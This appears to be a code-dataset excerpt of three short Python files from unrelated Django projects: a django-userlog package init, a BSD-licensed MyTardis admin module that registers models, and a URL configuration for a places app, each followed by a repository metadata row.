default_app_config = 'userlog.apps.UserLogConfig'
__version__ = '0.2'
| aaugustin/django-userlog | userlog/__init__.py | Python | bsd-3-clause | 71 |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2011, Monash e-Research Centre
# (Monash University, Australia)
# Copyright (c) 2010-2011, VeRSI Consortium
# (Victorian eResearch Strategic Initiative, Australia)
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the VeRSI, the VeRSI Consortium members, nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE REGENTS AND CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from tardis.tardis_portal import models
from django.contrib import admin
admin.site.register(models.XML_data)
admin.site.register(models.XSLT_docs)
admin.site.register(models.Experiment)
admin.site.register(models.Dataset)
admin.site.register(models.Dataset_File)
admin.site.register(models.Schema)
admin.site.register(models.ParameterName)
admin.site.register(models.DatafileParameter)
admin.site.register(models.DatasetParameter)
admin.site.register(models.Author_Experiment)
admin.site.register(models.UserProfile)
admin.site.register(models.ExperimentParameter)
admin.site.register(models.DatafileParameterSet)
admin.site.register(models.DatasetParameterSet)
admin.site.register(models.ExperimentParameterSet)
admin.site.register(models.GroupAdmin)
admin.site.register(models.UserAuthentication)
admin.site.register(models.ExperimentACL)
admin.site.register(models.Equipment)
| grischa/mytardis-mrtardis | tardis/tardis_portal/admin.py | Python | bsd-3-clause | 2,634 |
from django.conf.urls import patterns, include, url
urlpatterns = patterns(
'places.views',
url(r'^summary/(?P<place_slug>[^/]+)/$', 'summary'),
url(r'^profiles/(?P<place_slug>[^/]+)/$', 'profiles'),
url(r'^programs/(?P<place_slug>[^/]+)/$', 'programs'),
)
| MAPC/masshealth | places/urls.py | Python | bsd-3-clause | 275 |
Subsets and Splits